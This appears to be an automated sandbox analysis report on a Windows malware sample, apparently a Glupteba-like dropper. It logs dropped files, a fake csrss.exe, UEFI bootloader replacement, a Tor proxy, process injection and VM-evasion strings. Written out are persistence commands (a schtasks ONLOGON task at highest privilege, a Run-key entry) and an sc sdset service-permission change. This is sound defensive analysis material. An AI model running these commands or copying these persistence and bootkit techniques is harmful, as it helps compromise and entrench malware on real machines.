        Source: libssp-0.dll.20.dr Static PE information: section name: /55
        Source: libssp-0.dll.20.dr Static PE information: section name: /67
        Source: libssp-0.dll.20.dr Static PE information: section name: /80
        Source: libssp-0.dll.20.dr Static PE information: section name: /91
        Source: libssp-0.dll.20.dr Static PE information: section name: /102
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /4
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /14
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /29
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /41
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /55
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /67
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /80
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /91
        Source: libssl-1_1.dll.20.dr Static PE information: section name: /102
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /4
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /14
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /29
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /41
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /55
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /67
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /80
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /91
        Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /102
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /4
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /14
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /29
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /41
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /55
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /67
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /80
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /91
        Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /102
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /4
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /14
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /29
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /41
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /55
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /67
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /80
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /91
        Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /102
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /4
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /14
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /29
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /41
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /55
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /67
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /80
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /91
        Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /102
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /4
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /14
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /29
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /41
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /55
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /67
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /80
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /91
        Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /102
        Source: proxy.exe.20.dr Static PE information: section name: .symtab
        Source: bootmgfw.efi.20.dr Static PE information: section name: .xdata
        Source: bootx64.efi.20.dr Static PE information: section name: .xdata
        Source: EfiGuardDxe.efi.20.dr Static PE information: section name: .xdata
        Source: bootx64.efi.20.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
        Source: NtQuerySystemInformationHook.dll.20.dr Static PE information: real checksum: 0x0 should be: 0x2279d
        Source: csrss.exe.10.dr Static PE information: real checksum: 0x435435 should be: 0x4373eb
        Source: bootmgfw.efi.20.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
        Source: EfiGuardDxe.efi.20.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
        Source: proxy.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x70e262
        Source: kdsyitkxmS.exe Static PE information: real checksum: 0x435435 should be: 0x4373eb
        Source: injector.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x54ea2

        Persistence and Installation Behavior

        Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
        Source: C:\Windows\System32\fodhelper.exe Executable created and started: C:\Windows\rss\csrss.exe
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe File created: C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
        Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
        Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy)
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll
        Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
        Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy)

        Boot Survival

        Source: C:\Users\user\Desktop\kdsyitkxmS.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
        Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\netsh.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\rss\csrss.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\rss\csrss.exe - Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe - Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp - Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp - Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp - Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8520 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9036 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976 - Thread sleep count: 8562 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5028 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8868 - Thread sleep count: 8504 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2032 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9076 - Thread sleep count: 8214 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9128 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2484 - Thread sleep count: 8248 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 - Thread sleep count: 8222 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2816 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608 - Thread sleep count: 7947 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780 - Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 1488 - Thread sleep time: -370000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
